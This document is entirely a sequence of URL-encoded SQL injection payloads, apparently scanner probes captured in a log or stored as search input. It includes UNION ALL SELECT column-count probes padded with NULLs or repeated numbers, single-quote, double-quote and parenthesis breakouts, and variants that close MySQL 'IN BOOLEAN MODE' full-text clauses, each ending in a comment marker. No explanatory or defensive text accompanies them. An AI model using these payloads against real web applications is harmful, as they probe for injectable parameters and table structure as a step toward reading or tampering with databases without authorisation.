-3470%27%2B%28SELECT%20%27jZxw%27%20WHERE%206225%3D6225%20UNION%20ALL%20SELECT%206225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225%2C6225--%20 -6238%27%2B%28SELECT%20%27QfNl%27%20WHERE%209744%3D9744%20UNION%20ALL%20SELECT%209744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744%2C9744--%20 -9800%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377%2C3377--%20 -8702%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424%2C7424--%20 -4663%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008--%20 -7656%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759%2C1759--%20 -7949%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270%2C5270--%20 -8586%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590--%20 -1510%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270%2C1270--%20 -6812%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175%2C6175--%20 -1742%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582%2C9582--%20 -9023%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 